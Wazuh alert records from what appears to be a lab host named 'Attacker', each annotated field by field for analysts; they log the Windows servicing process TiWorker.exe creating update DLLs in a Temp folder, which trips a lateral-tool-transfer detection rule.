data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\CbsCore.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.030 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 9 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.646493 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.0468118Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260579 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.045
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\CbsMsg.dll
CreationUtcTime: 2025-04-20 01:55:28.045
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.045 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\CbsMsg.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.045 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 10 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.649454 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.1180755Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260590 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.116
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\ReserveManager.dll
CreationUtcTime: 2025-04-20 01:55:28.116
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.116 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\ReserveManager.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.116 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 11 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.652447 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.0635120Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260582 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.062
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\dpx.dll
CreationUtcTime: 2025-04-20 01:55:28.062
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.062 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\dpx.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.062 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 12 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.655396 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.1367565Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260595 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.135
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\turbocontainer.dll
CreationUtcTime: 2025-04-20 01:55:28.135
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.135 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\turbocontainer.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.135 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 13 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.658389 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.1426878Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260596 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.140
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\turbostack.dll
CreationUtcTime: 2025-04-20 01:55:28.140
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.140 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\turbostack.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.140 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 14 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.661366 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.1533935Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260597 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.152
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\updateagent.dll
CreationUtcTime: 2025-04-20 01:55:28.152
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.152 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\updateagent.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.152 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 15 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.664347 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.1725412Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260598 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.170
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\UpdateCompression.dll
CreationUtcTime: 2025-04-20 01:55:28.170
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
